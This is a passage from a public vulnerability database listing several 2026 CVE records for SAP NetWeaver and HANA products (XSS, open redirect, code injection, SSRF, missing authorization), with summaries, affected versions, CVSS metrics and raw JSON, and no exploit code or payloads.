      "dataVersion": "5.2"
    }

    CVE-2026-27682 (GCVE-0-2026-27682)

    Vulnerability from cvelistv5 – Published: 2026-05-12 02:19 – Updated: 2026-05-12 13:09
    VLAI
    Title
    Reflected Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Application Server ABAP (Applications based on Business Server Pages)
    Summary
    Due to a reflected cross-site scripting (XSS) vulnerability in SAP NetWeaver Application Server ABAP (Applications based on Business Server Pages), an unauthenticated attacker could craft a URL that exploits an unprotected URL parameter to embed a malicious script. If a victim clicks the link, the injected input is processed during web page generation, resulting in the execution of malicious content in the victim�s browser context. This could allow the attacker to access and/or modify information, impacting the confidentiality and integrity of the application, with no impact to availability.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-79 - Improper Neutralization of Input During Web Page Generation
    Assigner
    sap
    Impacted products
    Vendor Product Version
    SAP_SE SAP NetWeaver Application Server ABAP (Applications based on Business Server Pages) Affected: SAP_BASIS 700
    Affected: SAP_BASIS 701
    Affected: SAP_BASIS 702
    Affected: SAP_BASIS 731
    Affected: SAP_BASIS 740
    Affected: SAP_BASIS 750
    Affected: SAP_BASIS 751
    Affected: SAP_BASIS 752
    Affected: SAP_BASIS 753
    Affected: SAP_BASIS 754
    Affected: SAP_BASIS 755
    Affected: SAP_BASIS 756
    Affected: SAP_BASIS 757
    Affected: SAP_BASIS 758
    Affected: SAP_BASIS 816
    Affected: SAP_BASIS 918
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-27682",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-05-12T13:09:32.945260Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-05-12T13:09:40.621Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "SAP NetWeaver Application Server ABAP (Applications based on Business Server Pages)",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "SAP_BASIS 700"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 701"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 702"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 731"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 740"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 750"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 751"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 752"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 753"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 754"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 755"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 756"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 757"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 758"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 816"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 918"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eDue to a reflected cross-site scripting (XSS) vulnerability in SAP NetWeaver Application Server ABAP (Applications based on Business Server Pages), an unauthenticated attacker could craft a URL that exploits an unprotected URL parameter to embed a malicious script. If a victim clicks the link, the injected input is processed during web page generation, resulting in the execution of malicious content in the victim\ufffds browser context. This could allow the attacker to access and/or modify information, impacting the confidentiality and integrity of the application, with no impact to availability.\u003c/p\u003e"
                }
              ],
              "value": "Due to a reflected cross-site scripting (XSS) vulnerability in SAP NetWeaver Application Server ABAP (Applications based on Business Server Pages), an unauthenticated attacker could craft a URL that exploits an unprotected URL parameter to embed a malicious script. If a victim clicks the link, the injected input is processed during web page generation, resulting in the execution of malicious content in the victim\ufffds browser context. This could allow the attacker to access and/or modify information, impacting the confidentiality and integrity of the application, with no impact to availability."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 4.7,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-79",
                  "description": "CWE-79: Improper Neutralization of Input During Web Page Generation",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-05-12T02:19:26.976Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3728690"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Reflected Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Application Server ABAP (Applications based on Business Server Pages)",
          "x_generator": {
            "engine": "Vulnogram 1.0.2"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-27682",
        "datePublished": "2026-05-12T02:19:26.976Z",
        "dateReserved": "2026-02-23T17:50:17.027Z",
        "dateUpdated": "2026-05-12T13:09:40.621Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-34262 (GCVE-0-2026-34262)

    Vulnerability from cvelistv5 – Published: 2026-04-14 00:09 – Updated: 2026-04-29 19:32
    VLAI
    Title
    Information Disclosure Vulnerability in SAP HANA Cockpit and HANA Database Explorer
    Summary
    Information Disclosure Vulnerability in SAP HANA Cockpit and HANA Database Explorer
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-522 - Insufficiently Protected Credentials
    Assigner
    sap
    Impacted products
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-34262",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-04-14T12:53:11.415883Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-04-14T13:14:17.275Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          },
          {
            "providerMetadata": {
              "dateUpdated": "2026-04-29T19:32:17.156Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "url": "http://seclists.org/fulldisclosure/2026/Apr/16"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "SAP HANA Cockpit and HANA Database Explorer",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "SAP_HANA_COCKPIT 2.0"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eInformation Disclosure Vulnerability in SAP HANA Cockpit and HANA Database Explorer\u003c/p\u003e"
                }
              ],
              "value": "Information Disclosure Vulnerability in SAP HANA Cockpit and HANA Database Explorer"
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "integrityImpact": "NONE",
                "privilegesRequired": "LOW",
                "scope": "CHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-522",
                  "description": "CWE-522: Insufficiently Protected Credentials",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-04-14T00:09:03.364Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3730639"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Information Disclosure Vulnerability in SAP HANA Cockpit and HANA Database Explorer",
          "x_generator": {
            "engine": "Vulnogram 1.0.1"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-34262",
        "datePublished": "2026-04-14T00:09:03.364Z",
        "dateReserved": "2026-03-26T19:02:45.983Z",
        "dateUpdated": "2026-04-29T19:32:17.156Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-34257 (GCVE-0-2026-34257)

    Vulnerability from cvelistv5 – Published: 2026-04-14 00:08 – Updated: 2026-04-14 13:14
    VLAI
    Title
    Open Redirect vulnerability in SAP NetWeaver Application Server ABAP
    Summary
    Due to an Open Redirect vulnerability in SAP NetWeaver Application Server ABAP, an unauthenticated attacker could craft malicious URL that, if accessed by a victim, they could be redirected to the page controlled by the attacker. This causes low impact on confidentiality and integrity of the application with no impact on availability.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-601 - URL Redirection to Untrusted Site
    Assigner
    sap
    Impacted products
    Vendor Product Version
    SAP_SE SAP NetWeaver Application Server ABAP Affected: SAP_BASIS 700
    Affected: SAP_BASIS 701
    Affected: SAP_BASIS 702
    Affected: SAP_BASIS 731
    Affected: SAP_BASIS 740
    Affected: SAP_BASIS 750
    Affected: SAP_BASIS 752
    Affected: SAP_BASIS 753
    Affected: SAP_BASIS 754
    Affected: SAP_BASIS 755
    Affected: SAP_BASIS 756
    Affected: SAP_BASIS 757
    Affected: SAP_BASIS 758
    Affected: SAP_BASIS 816
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-34257",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-04-14T12:53:41.554329Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-04-14T13:14:17.620Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "SAP NetWeaver Application Server ABAP",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "SAP_BASIS 700"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 701"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 702"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 731"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 740"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 750"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 752"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 753"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 754"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 755"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 756"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 757"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 758"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 816"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eDue to an Open Redirect vulnerability in SAP NetWeaver Application Server ABAP, an unauthenticated attacker could craft malicious URL that, if accessed by a victim, they could be redirected to the page controlled by the attacker. This causes low impact on confidentiality and integrity of the application with no impact on availability.\u003c/p\u003e"
                }
              ],
              "value": "Due to an Open Redirect vulnerability in SAP NetWeaver Application Server ABAP, an unauthenticated attacker could craft malicious URL that, if accessed by a victim, they could be redirected to the page controlled by the attacker. This causes low impact on confidentiality and integrity of the application with no impact on availability."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-601",
                  "description": "CWE-601: URL Redirection to Untrusted Site",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-04-14T00:08:39.814Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3692004"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Open Redirect vulnerability in SAP NetWeaver Application Server ABAP",
          "x_generator": {
            "engine": "Vulnogram 1.0.1"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-34257",
        "datePublished": "2026-04-14T00:08:39.814Z",
        "dateReserved": "2026-03-26T19:02:45.982Z",
        "dateUpdated": "2026-04-14T13:14:17.620Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-27674 (GCVE-0-2026-27674)

    Vulnerability from cvelistv5 – Published: 2026-04-14 00:06 – Updated: 2026-04-15 03:58
    VLAI
    Title
    Code Injection vulnerability in SAP NetWeaver Application Server Java (Web Dynpro Java)
    Summary
    Due to a Code Injection vulnerability in SAP NetWeaver Application Server Java (Web Dynpro Java), an unauthenticated attacker could supply crafted input that is interpreted by the application and causes it to reference attacker-controlled content. If a victim accesses the affected functionality, that attacker-controlled content could be executed in the victim�s browser, potentially resulting in session compromise. This could allow the attacker to execute arbitrary client-side code, impacting the confidentiality and integrity of the application, with no impact to availability.
    SSVC
    Exploitation: none Automatable: no Technical Impact: total
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-94 - Improper Control of Generation of Code
    Assigner
    sap
    Impacted products
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-27674",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-04-14T00:00:00+00:00",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-04-15T03:58:11.103Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "SAP NetWeaver Application Server Java (Web Dynpro Java)",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "WD-RUNTIME 7.50"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eDue to a Code Injection vulnerability in SAP NetWeaver Application Server Java (Web Dynpro Java), an unauthenticated attacker could supply crafted input that is interpreted by the application and causes it to reference attacker-controlled content. If a victim accesses the affected functionality, that attacker-controlled content could be executed in the victim\ufffds browser, potentially resulting in session compromise. This could allow the attacker to execute arbitrary client-side code, impacting the confidentiality and integrity of the application, with no impact to availability.\u003c/p\u003e"
                }
              ],
              "value": "Due to a Code Injection vulnerability in SAP NetWeaver Application Server Java (Web Dynpro Java), an unauthenticated attacker could supply crafted input that is interpreted by the application and causes it to reference attacker-controlled content. If a victim accesses the affected functionality, that attacker-controlled content could be executed in the victim\ufffds browser, potentially resulting in session compromise. This could allow the attacker to execute arbitrary client-side code, impacting the confidentiality and integrity of the application, with no impact to availability."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-94",
                  "description": "CWE-94: Improper Control of Generation of Code",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-04-14T00:06:50.301Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3719397"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Code Injection vulnerability in SAP NetWeaver Application Server Java (Web Dynpro Java)",
          "x_generator": {
            "engine": "Vulnogram 1.0.1"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-27674",
        "datePublished": "2026-04-14T00:06:50.301Z",
        "dateReserved": "2026-02-23T17:50:10.513Z",
        "dateUpdated": "2026-04-15T03:58:11.103Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-27688 (GCVE-0-2026-27688)

    Vulnerability from cvelistv5 – Published: 2026-03-10 00:18 – Updated: 2026-03-11 03:56
    VLAI
    Title
    Missing Authorization check in SAP NetWeaver Application Server for ABAP
    Summary
    Due to a missing authorization check in SAP NetWeaver Application Server for ABAP, an authenticated attacker with user privileges could read Database Analyzer Log Files via a specific RFC function module. The attacker with the necessary privileges to execute this function module could potentially escalate their privileges and read the sensitive data, resulting in a limited impact on the confidentiality of the information stored. However, the integrity and availability of the system are not affected.
    SSVC
    Exploitation: none Automatable: no Technical Impact: total
    CISA Coordinator (v2.0.3)
    CWE
    Assigner
    sap
    Impacted products
    Vendor Product Version
    SAP_SE SAP NetWeaver Application Server for ABAP Affected: SAP_BASIS 700
    Affected: SAP_BASIS 701
    Affected: SAP_BASIS 702
    Affected: SAP_BASIS 710
    Affected: SAP_BASIS 711
    Affected: SAP_BASIS 730
    Affected: SAP_BASIS 731
    Affected: SAP_BASIS 740
    Affected: SAP_BASIS 750
    Affected: SAP_BASIS 751
    Affected: SAP_BASIS 752
    Affected: SAP_BASIS 753
    Affected: SAP_BASIS 754
    Affected: SAP_BASIS 755
    Affected: SAP_BASIS 756
    Affected: SAP_BASIS 757
    Affected: SAP_BASIS 758
    Affected: SAP_BASIS 816
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-27688",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-03-10T00:00:00+00:00",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-03-11T03:56:30.241Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "SAP NetWeaver Application Server for ABAP",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "SAP_BASIS 700"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 701"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 702"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 710"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 711"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 730"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 731"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 740"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 750"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 751"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 752"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 753"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 754"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 755"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 756"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 757"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 758"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 816"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eDue to a missing authorization check in SAP NetWeaver Application Server for ABAP, an authenticated attacker with user privileges could read Database Analyzer Log Files via a specific RFC function module. The attacker with the necessary privileges to execute this function module could potentially escalate their privileges and read the sensitive data, resulting in a limited impact on the confidentiality of the information stored. However, the integrity and availability of the system are not affected.\u003c/p\u003e"
                }
              ],
              "value": "Due to a missing authorization check in SAP NetWeaver Application Server for ABAP, an authenticated attacker with user privileges could read Database Analyzer Log Files via a specific RFC function module. The attacker with the necessary privileges to execute this function module could potentially escalate their privileges and read the sensitive data, resulting in a limited impact on the confidentiality of the information stored. However, the integrity and availability of the system are not affected."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "integrityImpact": "NONE",
                "privilegesRequired": "LOW",
                "scope": "CHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-862",
                  "description": "CWE-862: Missing Authorization",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-03-10T00:18:55.986Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3704740"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Missing Authorization check in SAP NetWeaver Application Server for ABAP",
          "x_generator": {
            "engine": "Vulnogram 1.0.0"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-27688",
        "datePublished": "2026-03-10T00:18:55.986Z",
        "dateReserved": "2026-02-23T17:50:17.028Z",
        "dateUpdated": "2026-03-11T03:56:30.241Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-24316 (GCVE-0-2026-24316)

    Vulnerability from cvelistv5 – Published: 2026-03-10 00:17 – Updated: 2026-03-10 16:53
    VLAI
    Title
    Server-Side Request Forgery (SSRF) in SAP NetWeaver Application Server for ABAP
    Summary
    SAP NetWeaver Application Server for ABAP provides an ABAP Report for testing purposes, which allows to send HTTP requests to arbitrary internal or external endpoints. The report is therefore vulnerable to Server-Side Request Forgery (SSRF). Successful exploitation could lead to interaction with potentially sensitive internal endpoints, resulting in a low impact on data confidentiality and integrity. There is no impact on availability of the application.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-918 - Server-Side Request Forgery
    Assigner
    sap
    Impacted products
    Vendor Product Version
    SAP_SE SAP NetWeaver Application Server for ABAP Affected: SAP_BASIS 740
    Affected: SAP_BASIS 750
    Affected: SAP_BASIS 751
    Affected: SAP_BASIS 752
    Affected: SAP_BASIS 753
    Affected: SAP_BASIS 754
    Affected: SAP_BASIS 755
    Affected: SAP_BASIS 756
    Affected: SAP_BASIS 757
    Affected: SAP_BASIS 758
    Affected: SAP_BASIS 816
    Affected: SAP_BASIS 918
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-24316",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-03-10T15:36:06.953702Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-03-10T16:53:14.123Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "SAP NetWeaver Application Server for ABAP",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "SAP_BASIS 740"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 750"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 751"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 752"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 753"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 754"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 755"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 756"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 757"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 758"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 816"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 918"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eSAP NetWeaver Application Server for ABAP provides an ABAP Report for testing purposes, which allows to send HTTP requests to arbitrary internal or external endpoints. The report is therefore vulnerable to Server-Side Request Forgery (SSRF). Successful exploitation could lead to interaction with potentially sensitive internal endpoints, resulting in a low impact on data confidentiality and integrity. There is no impact on availability of the application.\u003c/p\u003e"
                }
              ],
              "value": "SAP NetWeaver Application Server for ABAP provides an ABAP Report for testing purposes, which allows to send HTTP requests to arbitrary internal or external endpoints. The report is therefore vulnerable to Server-Side Request Forgery (SSRF). Successful exploitation could lead to interaction with potentially sensitive internal endpoints, resulting in a low impact on data confidentiality and integrity. There is no impact on availability of the application."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 6.4,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "integrityImpact": "LOW",
                "privilegesRequired": "LOW",
